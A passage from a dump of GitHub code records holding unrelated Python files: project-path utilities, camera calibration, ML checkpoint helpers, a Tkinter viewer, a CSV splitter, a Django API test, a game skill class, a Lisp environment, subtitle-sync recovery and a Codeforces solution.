bool:\n \"\"\"当前目录是否为项目目录\n \"\"\"\n project_file = p / PROJECT_FILE\n return project_file.is_file()\n\n\ndef is_stack_dir(p: Path) -> bool:\n \"\"\"当前目录是否为 Stack 目录\n \"\"\"\n stack_file = p / STACK_FILE\n return stack_file.is_file()\n\n\ndef has_settings_file(path: Path) -> bool:\n \"\"\"当前目录是否包含 settings 文件\n \"\"\"\n settings_file = path / SETTINGS_FILE\n return settings_file.is_file()\n\n\ndef check_path_is_relative_to(\n path_a: Union[str, Path], path_b: Union[str, Path]\n):\n \"\"\"\n check if path_a is relative to path_b.\n Here are some examples:\n path_a: Path('/etc/passwd/') path_b: Path('/etc') True\n path_a: Path('/etc/') path_b: Path('/etc') True\n path_a: Path('/etc/a/b/c') path_b: Path('/etc') True\n path_a: Path('/usr/') path_b: Path('/etc') False\n\n :param path_a: string type or pathlib.Path type.\n :param path_b: string type or pathlib.Path type.\n :return: if path_a is relative to path_b.\n \"\"\"\n return Path(path_b) in [p for p in Path(path_a).parents] + [Path(path_a)]\n\n\ndef filter_project_dir() -> List[Path]:\n \"\"\"\n filter the project_dirs by $CHANGED_FILE_URL and $IGNORE_PATHS, only changed project will be reserved.\n $CHANGED_FILE_URL:\n string type.\n the url contains a changed_file.txt file and the file's content is changed file paths separated by newline.\n passed from env variable $CHANGED_FILE_URL\n $IGNORE_PATHS:\n ignore_paths_str: string type.\n paths to ignore separated by ','. 
the path to ignore should be project level directory or higher.\n passed from env variable IGNORE_PATHS\n :return: the filtered dirs\n \"\"\"\n all_project_dirs = get_konfig_projects_relative()\n # use string output directly\n change_file = os.getenv(\"CHANGED_FILE\")\n ignore_paths_str = os.getenv(\"IGNORE_PATHS\")\n mode_filter = os.getenv(\"KCL_TEST_MODE\")\n\n if mode_filter != \"biz\":\n # when KCL_TEST_MODE is 'base', all test cases under Konfig/sigma will be tested\n change_paths = all_project_dirs\n else:\n # change_paths_str = get_changed_files_from_oss(change_paths_url)\n change_paths_str = change_file\n print(f'Change Path: {change_paths_str}')\n if change_paths_str == EMPTY_CHANGE_LIST or not change_paths_str:\n return []\n if change_paths_str == TRIGGER_ALL_TEST:\n # when change_paths' content is zz_all_test, all test cases under Konfig/sigma will be tested\n change_paths = all_project_dirs\n else:\n # when KCL_TEST_MODE is 'biz', only cases under specified root dir will be tested\n change_paths = [item for item in change_paths_str.split(\"\\n\") if item]\n ignore_path_list = []\n if ignore_paths_str:\n ignore_path_list = [item for item in ignore_paths_str.split(\",\") if item]\n changed_projects = []\n for change_path in change_paths:\n if any(\n [\n check_path_is_relative_to(change_path, ignore_path)\n for ignore_path in ignore_path_list\n ]\n ):\n continue\n for project_path in all_project_dirs:\n if check_path_is_relative_to(change_path, project_path) and project_path not in changed_projects:\n changed_projects.append(project_path)\n return changed_projects\n","repo_name":"elliotxx/Konfig","sub_path":"hack/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74987129040","text":"import os\nimport cv2 as cv\nimport numpy as np\nimport utils\nimport PIL.Image\n\n\ndef calibrate_manual(\n src_cam: cv.VideoCapture, dst_cam: cv.VideoCapture, S=(1.0, 1.0), T=(0, 0)\n):\n S = list(S)\n T = list(T)\n keep_ratio = True\n\n while True:\n # read images from both cameras\n is_ok, src_image = src_cam.read()\n if not is_ok:\n continue\n\n is_ok, dst_image = dst_cam.read()\n if not is_ok:\n continue\n\n # Scale\n src_image = cv.resize(src_image, None, fx=S[0], fy=S[1])\n\n # get BGR and Gray\n src_rgba = utils.to_rgba(src_image)\n dst_rgba = utils.to_rgba(dst_image)\n # combine\n src_rgba[:, :, 3] = 170\n src_pil = PIL.Image.fromarray(src_rgba)\n dst_pil = PIL.Image.fromarray(dst_rgba)\n dst_pil.paste(src_pil, (T[0], T[1]), src_pil)\n dst_bgr = np.array(dst_pil)\n\n cv.imshow(\"dst\", dst_bgr[..., [2,1,0,3]])\n\n key = cv.waitKey(10)\n if key == 27:\n break\n elif key != -1:\n if key == ord(\"a\"):\n S[0] -= 0.01\n if keep_ratio:\n S[1] -= 0.01\n elif key == ord(\"d\"):\n S[0] += 0.01\n if keep_ratio:\n S[1] += 0.01\n elif key == ord(\"s\"):\n S[1] -= 0.01\n if keep_ratio:\n S[0] -= 0.01\n elif key == ord(\"w\"):\n S[1] += 0.01\n if keep_ratio:\n S[0] += 0.01\n elif key == ord(\"j\"):\n T[0] -= 1\n elif key == ord(\"l\"):\n T[0] += 1\n elif key == ord(\"i\"):\n T[1] -= 1\n elif key == ord(\"k\"):\n T[1] += 1\n elif key == ord(\"q\"):\n keep_ratio = not keep_ratio\n\n print(f'S={S}, T={T}, keep_ratio={keep_ratio}')\n\n cv.destroyAllWindows()\n\n return S, T\n\n\ndef load_manual(path):\n if os.path.isfile(path):\n data = np.load(path)\n return data[\"S\"], data[\"T\"]\n\n return (1.0, 1.0), (0, 0)\n\ndef save_manual(path, S, T):\n np.savez(path, S=S, 
T=T)\n\nif __name__ == \"__main__\":\n rgb_cam = cv.VideoCapture(0)\n infrared_cam = utils.InfraredCamera()\n\n S, T = load_manual(\"manual.npz\")\n S, T = calibrate_manual(rgb_cam, infrared_cam, S, T)\n save_manual(\"manual.npz\", S ,T)\n\n rgb_cam.release()\n infrared_cam.release()\n","repo_name":"tranduytrung/camera-alignment","sub_path":"manual.py","file_name":"manual.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5046795647","text":"import json\nimport os\nimport random\nfrom datetime import datetime\nfrom typing import Tuple\nimport sys \n\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom keras.models import Model, model_from_json\n\n\ndef fix_seeds(seed: int=1234) -> None:\n \"\"\"\n Fix all random seeds for reproducibility\n for PyTorch pipelenes\n \"\"\"\n random.seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef fix_seeds_tf(seed: int=1234) -> None:\n \"\"\"\n Fix all random seeds for reproducibility\n for Tensorflow 2.2\n \"\"\"\n import tensorflow as tf\n random.seed(seed)\n os.environ[\"PYTHONHASHSEED\"] = str(seed)\n os.environ['TF_DETERMINISTIC_OPS'] = str(seed)\n np.random.seed(seed)\n tf.random.set_seed(seed)\n \n\ndef load_optim(optimizer: torch.optim, checkpoint_path: str, device: torch.device) -> torch.optim:\n \"\"\"\n Load optimizer to continuer training\n Args:\n optimizer : initialized optimizer\n checkpoint_path: path to the checkpoint\n device : device to send optimizer to (must be the same as in the model)\n \n Note: must be called after initializing the model \n\n Output: optimizer with the loaded state\n \"\"\" \n checkpoint = torch.load(checkpoint_path) \n optimizer.load_state_dict(checkpoint['optimizer'])\n for state in optimizer.state.values():\n for k, v in state.items():\n if torch.is_tensor(v):\n state[k] = v.to(device) \n\n for param_group in optimizer.param_groups:\n print('learning_rate: {}'.format(param_group['lr'])) \n\n print('Loaded optimizer {} state from {}'.format(optimizer, checkpoint_path)) \n \n return optimizer\n\n\ndef save_ckpt(model: nn.Module, optimizer: torch.optim, checkpoint_path: str) -> dict:\n \"\"\"\n Save model and optimizer checkpoint to continuer training\n \"\"\" \n torch.save({\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n },\n checkpoint_path\n )\n print(\"Saved model and optimizer state to {}\".format(checkpoint_path))\n\n\ndef load_ckpt(checkpoint_path: str) -> dict:\n \"\"\"\n Load checkpoint to continuer training\n Args:\n checkpoint_path: path to the checkpoint\n\n Output: (dict) 0f the checkpoint state \n\n \"\"\" \n checkpoint = torch.load(checkpoint_path)\n \n return checkpoint\n\n\ndef load_model(model: nn.Module, checkpoint_path: str) -> tuple:\n \"\"\"\n Load model weigths to continuer training\n Args:\n model : nn model\n checkpoint_path: path to the checkpoint \n\n Output: \n (nn.Module) nn model with weights\n (dict) 0f the checkpoint state\n \"\"\" \n checkpoint = torch.load(checkpoint_path)\n model.load_state_dict(checkpoint['model'])\n \n return model, checkpoint \n\n\ndef collate_fn(batch):\n return tuple(zip(*batch))\n\n\ndef load_weights(model: nn.Module, weights_file: str):\n model.load_state_dict(torch.load(weights_file))\n return model\n\n\ndef plot_layer_output(model: Model, layer_name = 
'lambda', fhr=None) -> None:\n    # plot the output of an intermediate layer for a given input batch fhr\n    import matplotlib.pyplot as plt\n    new_model = Model(inputs = model.input, outputs = model.get_layer(layer_name).output)\n    intermediate_output = new_model.predict(fhr)\n    #print(intermediate_output)\n    #print(intermediate_output.shape)\n    intermediate_out = np.reshape(intermediate_output, (intermediate_output.shape[0], 4800))\n    #plot intermediate output\n    fig1 = plt.figure(1)\n    plt.plot(intermediate_out[0, :], 'b')\n    plt.show()\n","repo_name":"tatigabru/transforms","sub_path":"src/helpers/model_helpers.py","file_name":"model_helpers.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17346479093","text":"import logging\nfrom tkinter import ttk, filedialog, messagebox, BOTTOM\nimport tkinter as tk\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), 'res/'))\nfrom tkinterbase import TkBase  # noqa: E402\nfrom data import check_valid_path  # noqa: E402\n\ndefault_toolitems = (\n    ('Home', 'Reset original view', 'home', 'home'),\n    ('Back', 'Back to previous view', 'back', 'back'),\n    ('Forward', 'Forward to next view', 'forward', 'forward'),\n    (None, None, None, None),\n    ('Pan', 'Pan axes with left mouse, zoom with right', 'move', 'pan'),\n    ('Zoom', 'Zoom to rectangle', 'zoom_to_rect', 'zoom'),\n    ('Subplots', 'Configure subplots', 'subplots', 'configure_subplots'),\n    (None, None, None, None),\n    ('Annotate', 'Create an annotation', 'annotate', 'call_annotate'),\n    ('Confirm', 'Confirm annotation', 'confirm', 'call_confirm'),\n    (None, None, None, None),\n    ('Open', 'Opens a new project', 'open', 'call_open'),\n    ('Export', 'Export to PDF', 'export', 'call_export'),\n    ('Save', 'Save the graph as PNG', 'filesave', 'save_figure'),\n    ('Open Concurrent', 'Open a concurrent graph view',\n     'compare', 'call_open_concurrent'),\n    (None, None, None, None),\n    ('Quit', 'Quit application', 'quit', 'call_quit'),\n)\n\n\nclass HomePage:\n\n    def __init__(self, master):\n\n        logging.basicConfig(filename='event_log.log',\n                            level=logging.INFO, filemode='w')\n        logging.info('Starting application')\n\n        # Initialises window with background image and widgets\n        self.master = master\n        master.title(\"BrainWave Visualization - HomePage\")\n        master.iconbitmap(r'res/general_images/favicon.ico')\n        self.frame = tk.Frame(self.master)\n        fname = r'res/general_images/homepage.png'\n        self.bg_image = tk.PhotoImage(file=fname)\n        # Centering window\n        self.w = self.bg_image.width()\n        self.h = self.bg_image.height()\n        self.window_width = self.master.winfo_reqwidth()\n        self.window_height = self.master.winfo_reqheight()\n        self.x = (self.master.winfo_screenwidth() / 2) - (self.w / 2)\n        self.y = (self.master.winfo_screenheight() / 2) - (self.h / 2)\n        self.master.geometry(\"%dx%d+%d+%d\" % (self.w, self.h, self.x, self.y))\n        self.cv = tk.Canvas(width=self.w, height=self.h)\n        self.cv.pack(side='top', fill='both', expand='yes')\n        self.cv.create_image(0, 0, image=self.bg_image, anchor='nw')\n        # Define buttons here\n        self.open_button = ttk.Button(\n            self.cv, text='Open', width=25, command=self.load_project)\n        self.quit_button = ttk.Button(\n            self.cv, text='Quit', width=25, command=self.close)\n        # Buttons packed here - in descending order (Things at bottom will\n        # appear at top)\n        self.quit_button.pack(side=BOTTOM, padx=10, pady=25)\n        self.open_button.pack(side=BOTTOM, padx=10, pady=25)\n        self.frame.pack()\n\n    def load_project(self):\n        \"\"\"\n        handler function for the open button, loads project if given a valid path otherwise does 
nothing\n \"\"\"\n path = filedialog.askdirectory()\n if not path:\n # If user exits file directory - do nothing\n pass\n else:\n path = path + \"/\"\n try:\n if check_valid_path(path):\n # Destroys homepage and runs main app\n self.open_button.destroy()\n self.quit_button.destroy()\n self.cv.destroy()\n TkBase(root, path, default_toolitems)\n root.resizable(True, True)\n root.configure(bg=\"#949494\")\n except Exception as e:\n # If user picks a folder with no .cal or .wav files - shows\n # error msg\n messagebox.showerror(\"Error: \", e)\n\n def close(self):\n # Pop up to user asking them if they want to quit\n if messagebox.askokcancel(\"\", \"Are you sure you want to quit?\"):\n self.master.destroy()\n\n\nroot = tk.Tk()\nroot.resizable(False, False)\napp = HomePage(root)\nroot.mainloop()\n","repo_name":"ross-johnstone/BrainWave-NHS","sub_path":"homePage.py","file_name":"homePage.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"22845804726","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport csv\n\narchivocsv = \"/home/raimundoosf/Escritorio/Proyecto2U2/drugsComTest_raw.csv\"\n\n\"\"\"convercion de lista a archivo csv\"\"\"\ndef convert_to_csv(data_name, data):\n\n # se definen las columnas del archvio csv\n columns = [\"uniqueID\", \"drugName\", \"condition\", \"review\", \"rating\", \"date\", \"usefulCount\"]\n \n # crea lista\n rows = []\n # se agregan lineas/filas a lista\n for index in range(0, len(data)):\n rows.append([data[index][\"uniqueID\"], data[index][\"drugName\"],\n data[index][\"condition\"], data[index][\"review\"],\n data[index][\"rating\"], data[index][\"date\"], \n data[index][\"usefulCount\"]])\n\n # se abre/crea archivo csv \n with open(f'{data_name}.csv', 'w') as f:\n # usando csv.writer method desde CSV package\n write = csv.writer(f)\n\n write.writerow(columns)\n write.writerows(rows)\n\n\n\"\"\"separacion de archivo scv por año\"\"\"\ndef separete_files():\n\n # se crea dataframe\n df = pd.read_csv(archivocsv)\n\n # se crea lista para simplificar algoritmia \n data = ['data_2008', 'data_2009', 'data_2010', 'data_2011', 'data_2012',\n 'data_2013', 'data_2014', 'data_2015', 'data_2016', 'data_2017']\n \n # se hace copia de lista\n data_aux = data[:]\n\n # crean listas dentro de copia de lista\n for index in range(0,len(data_aux)):\n data_aux[index] = []\n\n # abre ciclo\n for index in range(0,len(df.index)):\n # 'line' corresponde a linea especifica de 'dt'\n line = df.iloc[index]\n # abre ciclo interno\n for sub_index in range(0, len(data)):\n # si linea contiene ultimos dos caracteres de elemento en 'data'\n if line.str.contains(f'-{data[sub_index][-2:]}').any():\n # se identifica año respectivo de 'line'\n # se agrega 'line' a lista de año respectivo\n data_aux[sub_index].append(line)\n # se acaba ciclo interno\n break\n # no hay asociacion de año determinado en 'data' con 'line'\n else:\n # se continua a siguiente ciclo interno para evetual asociacion\n continue\n \n # abre ciclo for para convertir cada lista 'data_aux[]' a archivo csv\n for index in range(0,len(data)):\n # se llama a funcion\n convert_to_csv(data[index], data_aux[index])\n \nif __name__ == \"__main__\":\n # Llama\n separete_files()\n","repo_name":"raioliva21/Proyecto2-U2","sub_path":"separacion_archivo.py","file_name":"separacion_archivo.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"8527144629","text":"import itertools\nimport json\nfrom uuid import UUID\n\nimport pytest\nfrom model_bakery import baker\n\nfrom gtfs.models import Departure, Route, Shape, Trip\nfrom gtfs.tests.utils import clean_shapes_for_snapshot, get_feed_for_maas_operator\n\nENDPOINT = \"/v1/shapes/\"\n\n\n@pytest.fixture\ndef api_id_generator():\n return (UUID(int=i) for i in itertools.count())\n\n\n@pytest.mark.parametrize(\n \"filtering\",\n [\n {},\n {\"route_id\": \"00000000-0000-0000-0000-000000000000\"},\n {\"route_id\": \"00000000-0000-0000-0000-000000000001\"},\n {\"departure_id\": \"00000000-0000-0000-0000-000000000002\"}, # first route\n {\"departure_id\": \"00000000-0000-0000-0000-000000000004\"}, # second route\n ],\n)\n@pytest.mark.django_db\ndef test_shapes(maas_api_client, snapshot, api_id_generator, filtering):\n feed = get_feed_for_maas_operator(maas_api_client.maas_operator, True)\n routes = baker.make(Route, feed=feed, api_id=api_id_generator, _quantity=2)\n shapes = baker.make(\n Shape,\n api_id=iter(\n [\n \"DEADBEEF-0000-0000-0000-000000000000\", # first route\n \"BABEFACE-0000-0000-0000-000000000000\", # first route\n \"C0FFEE00-0000-0000-0000-000000000000\", # second route\n ]\n ),\n feed=feed,\n _quantity=3,\n )\n\n first_route_trips = baker.make(\n Trip,\n feed=feed,\n route=routes[0],\n shape=iter([shapes[0], shapes[1]]),\n _quantity=2,\n )\n second_route_trip = baker.make(Trip, feed=feed, route=routes[1], shape=shapes[2])\n baker.make(\n Departure,\n api_id=api_id_generator,\n trip=iter([first_route_trips[0], first_route_trips[1], second_route_trip]),\n _quantity=3,\n )\n\n response = maas_api_client.get(ENDPOINT, filtering)\n content = json.loads(response.content)\n if filtering:\n assert response.status_code == 200\n content = clean_shapes_for_snapshot(content)\n else:\n assert response.status_code == 400\n snapshot.assert_match(content)\n","repo_name":"City-of-Helsinki/maritime-maas","sub_path":"gtfs/tests/test_shapes_api.py","file_name":"test_shapes_api.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30117993847","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\nfrom dm.skills.Common._common import CommonSkill\nfrom utilities import SkillEffect, CooldownType\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.game.game import DMGame\n from dm.core.objects.unit import DMUnit\n################################################################################\n\n__all__ = (\"Multistrike\",)\n\n################################################################################\nclass Multistrike(CommonSkill):\n\n def __init__(self, state: DMGame, parent: DMUnit = None):\n\n super().__init__(\n state, parent,\n _id=\"SKL-134\",\n name=\"Multistrike\",\n description=(\n \"Inflict 6 (+3.0*ATK) damage to an enemy. 
Repeats 3 times.\"\n ),\n rank=3,\n cooldown=CooldownType.SingleTarget,\n effect=SkillEffect(base=6, scalar=3)\n )\n\n################################################################################\n def execute(self, ctx: AttackContext) -> None:\n\n # If we're attacking\n if self.owner == ctx.source:\n # Damage the target three times\n for _ in range(3):\n ctx.target.damage(self.effect)\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/skills/Common/BRank/Multistrike.py","file_name":"Multistrike.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14891310716","text":"# -*- coding: utf-8 -*-\n\nfrom errors import LispNamingError\nfrom types import Builtin, boolean, integer, value_of\n\nclass Environment(dict):\n def __init__(self, vars=None, outer=None):\n self.outer = outer\n if vars:\n self.update(vars)\n\n def __getitem__(self, key):\n return self.defining_env(key).get(key)\n\n def defining_env(self, variable):\n \"Find the innermost environment defining a variable\"\n if variable in self:\n return self\n elif self.outer is not None:\n return self.outer.defining_env(variable)\n else:\n raise LispNamingError(\"Variable '%s' is undefined\" % variable)\n\ndef get_builtin_env():\n \"\"\"Returns an environment with the builtin functions defined.\n\n You probably want to use moolisp.interpreter.default_env instead,\n which is this extended with the Moo Lisp core functions.\"\"\"\n return Environment({\n '+': Builtin(lambda x, y: integer(value_of(x) + value_of(y))),\n '-': Builtin(lambda x, y: integer(value_of(x) - value_of(y))),\n '*': Builtin(lambda x, y: integer(value_of(x) * value_of(y))),\n '/': Builtin(lambda x, y: integer(value_of(x) / value_of(y))),\n 'mod': Builtin(lambda x, y: integer(value_of(x) % value_of(y))),\n\n '=': Builtin(lambda x, y: boolean(x == y)), \n '>': Builtin(lambda x, y: boolean(x > y)), \n '<': Builtin(lambda x, y: boolean(x < y)), \n '>=': Builtin(lambda x, y: boolean(x >= y)), \n '<=': Builtin(lambda x, y: boolean(x <= y)),\n\n 'cons': Builtin(lambda h, rest: [h] + rest),\n 'car': Builtin(lambda lst: lst[0]),\n 'cdr': Builtin(lambda lst: 'nil' if len(lst) == 1 else lst[1:]),\n 'list': Builtin(lambda *args: 'nil' if len(args) == 0 else list(args))\n })\n","repo_name":"kvalle/moo-lisp","sub_path":"moolisp/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31145541656","text":"import os\nfrom alive_progress import alive_bar\nimport datetime\nimport srt\nfrom pathlib import Path\n# Script for recovery of subtitles, in case of main script error\n\n\ndef load_recovery(recovery_path):\n \"\"\" Splits each line on the \"|\" symbol\n\n Args:\n recovery_path (str): path to recovery file\n\n Returns:\n lines (list): list of split lines from recovery file\n \"\"\"\n\n recovery_file = open(recovery_path, \"r\", encoding=\"utf-8\")\n lines = []\n for line in recovery_file:\n lines.append(line.split(\"|\"))\n\n recovery_file.close()\n return lines\n\n\ndef load_subtitles(subtitles_path):\n \"\"\" Loads subtitles from .txt file, removes end spaces and end \\n symbol\n\n Args:\n subtitles_path (str): path to subtitle text file\n\n Returns:\n subtitles (list): list of individual words from the sentences\n native_subtitles (list): list of whole sentences\n 
\"\"\"\n\n file = open(subtitles_path, \"r+\", encoding=\"utf8\")\n\n # removes blank lines\n temp = []\n subtitles = []\n for line in file:\n if repr(line) == repr('\\n'):\n block = ''.join(temp)\n subtitles.append(block)\n temp = []\n else:\n temp.append(line)\n block = ''.join(temp)\n subtitles.append(block)\n\n # removes the new-line character from end of line\n for element in subtitles:\n subtitles[subtitles.index(element)] = element.rstrip(' \\n')\n native_subtitles = list(subtitles)\n\n # splits the sentence into list of words\n for element in subtitles:\n split = element.split()\n temp = []\n for word in split:\n if \"-\" in word:\n word = word.split(\"-\")\n for split_word in word:\n temp.append(split_word)\n else:\n temp.append(word)\n subtitles[subtitles.index(element)] = temp\n\n file.close()\n return subtitles, native_subtitles\n\n\ndef create_srt(frame_info):\n \"\"\" Creates srt file, from collected frame info\n\n Args:\n frame_info (list): list of information about start and end frames\n \"\"\"\n\n file = open(\"subtitles/Finished_subtitles.txt\", \"w+\", encoding=\"utf8\")\n subtitles = []\n for element in frame_info:\n start = datetime.timedelta(seconds=element[0][0], microseconds=element[0][1])\n end = datetime.timedelta(seconds=element[1][0], microseconds=element[1][1])\n index = element[2]\n content = element[3]\n\n subtitle = srt.Subtitle(index=index, start=start, end=end, content=content)\n subtitles.append(subtitle)\n\n text = srt.compose(subtitles)\n file.write(text)\n file.close()\n\n if os.path.exists(\"subtitles/Finished_subtitles.srt\"):\n os.remove(\"subtitles/Finished_subtitles.srt\")\n p = Path(\"subtitles/Finished_subtitles.txt\")\n p.rename(p.with_suffix('.srt'))\n file.close()\n\n\ndef key_words(current_sub, next_sub):\n \"\"\" Finds words that are in the current subtitle, but are not in the next one\n\n Args:\n current_sub (list): list of words in the current subtitle\n next_sub (list): list of words in the next subtitle\n\n Returns:\n words (list): list of \"keywords\"\n \"\"\"\n\n # Creates a list of same words\n similar_words = []\n for element in current_sub:\n if element in next_sub:\n similar_words.append(element)\n\n # removes same words, leaving only keywords\n for element in similar_words:\n current_sub.remove(element)\n words = current_sub\n\n return words\n\n\ndef text_prep(ocr_text, subtitles, text_index):\n \"\"\" Clears needed text. Deletes all \"wrong\" characters. 
Characters that are not words.\n\n Args:\n ocr_text (list): Text that the OCR found\n subtitles (list): Loaded subtitles\n text_index (int): Index of subtitle\n\n Returns:\n clear_current (list): Clear current subtitle\n clear_next (list): Clear next subtitle\n clear_ocr (list): Clear OCR text\n \"\"\"\n\n current_sub = subtitles[text_index]\n next_sub = subtitles[text_index+1]\n wrong_char = [\",\", \".\", \"?\", \"/\", \"\\\\\", \"<\", \">\", \";\", \":\", \"'\", \"|\", \"[\", \"]\", \"{\", \"}\", \"!\",\n \"@\", \"#\", \"$\", \"%\", \"^\", \"&\", \"*\", \"(\", \")\", \"=\", \"+\", \"`\", \"~\", \"-\"]\n\n # clears current subtitle\n clear_current = []\n for element in current_sub:\n element = element.lower()\n if element not in wrong_char:\n for char in wrong_char:\n element = element.rstrip(char)\n element = element.lstrip(char)\n clear_current.append(element)\n\n # clears next subtitle\n clear_next = []\n for element in next_sub:\n element = element.lower()\n if element not in wrong_char:\n for char in wrong_char:\n element = element.rstrip(char)\n element = element.lstrip(char)\n clear_next.append(element)\n\n # clear OCR text\n clear_ocr = []\n for element in ocr_text:\n element = element.lower()\n if element not in wrong_char:\n for char in wrong_char:\n element = element.rstrip(char)\n element = element.lstrip(char)\n clear_ocr.append(element)\n\n return clear_current, clear_next, clear_ocr\n\n\ndef how_similar_ocr(clear_ocr_text, current_sub):\n \"\"\" Determines how similar the OCR text is to the current subtitle\n\n Args:\n clear_ocr_text (list): List of current OCR text\n current_sub (list): List of current subtitle text\n\n Returns:\n how_similar (float): Percentage of how similar the OCR is to the subtitle\n \"\"\"\n\n temp_ocr = list(clear_ocr_text)\n similar_words = 0\n for element in current_sub:\n if element in temp_ocr:\n temp_ocr.remove(element)\n similar_words += 1\n how_similar = (similar_words * 100) / len(current_sub)\n\n return how_similar\n\n\ndef how_similar_next(current_sub, next_sub):\n \"\"\" Determines how similar the current subtitle is to the next subtitle\n\n Args:\n current_sub (list): List of current subtitle text\n next_sub (list): List of next subtitle text\n\n Returns:\n how_similar (float): Percentage of how similar the current subtitle is to the next subtitle\n \"\"\"\n\n similar_words = 0\n for element in current_sub:\n if element in next_sub:\n next_sub.remove(element)\n similar_words += 1\n how_similar = (similar_words * 100) / len(current_sub)\n\n return how_similar\n\n\ndef is_similar(ocr_text, text_index, subtitles, acceptable_value=50):\n \"\"\" Decides if the OCR is similar to the current subtitle.\n If current subtitle is not similar to next one - decides based only on similarity.\n If current subtitle is similar to next one - decides based on similarity and keywords.\n Keywords are words that are in the current subtitle, but are not in the next one.\n\n Args:\n ocr_text (list): Current OCR text\n text_index (int): Index of current subtitle\n subtitles (list): List of all subtitles\n acceptable_value (int): Percentage from where the OCR text is considered similar to subtitle\n\n Returns:\n True (bool): If similar and (keywords are in the current subtitle)\n False (bool: If not similar or (no keywords in the current subtitle)\n \"\"\"\n\n # prepares the text and finds keywords\n current_sub, next_sub, clear_ocr_text = text_prep(ocr_text, subtitles, text_index)\n key_word = key_words(current_sub, next_sub)\n\n # finds how similar the OCR is 
to the subtitle and how similar the current subtitle is to the next one\n how_similar_to_ocr = how_similar_ocr(clear_ocr_text, current_sub)\n how_similar_to_next = how_similar_next(current_sub, next_sub)\n\n # counts how many keywords appear in the OCR\n keys_in_ocr = 0\n temp_ocr = list(clear_ocr_text)\n for word in key_word:\n if word in temp_ocr:\n temp_ocr.remove(word)\n keys_in_ocr += 1\n\n if how_similar_to_next >= 70:\n if how_similar_to_ocr >= acceptable_value and keys_in_ocr == len(key_word):\n return True\n else:\n return False\n else:\n if how_similar_to_ocr >= acceptable_value:\n return True\n else:\n return False\n\n\ndef recover(recovery_path, subtitles_path):\n \"\"\" Creates subtitles based on the information from the recovery file\n\n Args:\n recovery_path (str): Path to recovery file\n subtitles_path (str): Path to subtitles\n \"\"\"\n\n subtitles, native_subtitles = load_subtitles(subtitles_path)\n recovery_lines = load_recovery(recovery_path)\n with alive_bar(len(recovery_lines), force_tty=True) as bar:\n frame_info = []\n text_index = 0\n time_of_frame = []\n i = 0\n while i < len(recovery_lines):\n bad_text_index, ocr_text, name_of_frame, s_time, ms_time = recovery_lines[i]\n s_time = float(s_time)\n ms_time = float(ms_time)\n ocr_text = ocr_text.split(\" \")\n\n if text_index+1 < len(subtitles):\n similar = is_similar(ocr_text, text_index, subtitles)\n\n if similar is True:\n time_of_frame.append([s_time, ms_time])\n elif len(time_of_frame) != 0:\n frame_info.append([time_of_frame[0], time_of_frame[-1], text_index, native_subtitles[text_index]])\n time_of_frame = []\n text_index += 1\n\n if text_index + 1 < len(subtitles):\n similar = is_similar(ocr_text, text_index, subtitles)\n if similar is True:\n time_of_frame.append([s_time, ms_time])\n\n i += 1\n bar()\n create_srt(frame_info)\n\n\nif __name__ == \"__main__\":\n subtitles_file_path = \"subtitles/subtitles4.txt\"\n recovery_file_path = \"subtitles/recovery_file_similar.txt\"\n recover(recovery_file_path, subtitles_file_path)\n","repo_name":"MarcelRossol/OCR-subtitle-sychronisation","sub_path":"create_subtitles/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":9917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42289649443","text":"from math import log2 as log\n\nn,k=map(int,input().split())\n\nresult=[]\n\nif n%2==1:\n result.append(1)\n n-=1;k-=1\n #print(n,k)\n\nwhile n>0 and k>0:\n temp=int(log(n))\n j=0\n \n if n>k:\n while(j<=n):\n flag=pow(2,temp-j)\n j+=1\n \n if n-flag>=k-1:\n result.append(flag)\n n-=flag;k-=1\n break\n #print(n,k)\n\n else:\n break\n\n\nif n==k:\n print('YES')\n for i in range(len(result)):\n print(result[i],end=' ')\n for i in range(n):\n print(1,end=' ')\nelse:\n print('NO')\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/1095C - C. Powers Of Two.py","file_name":"1095C - C. 
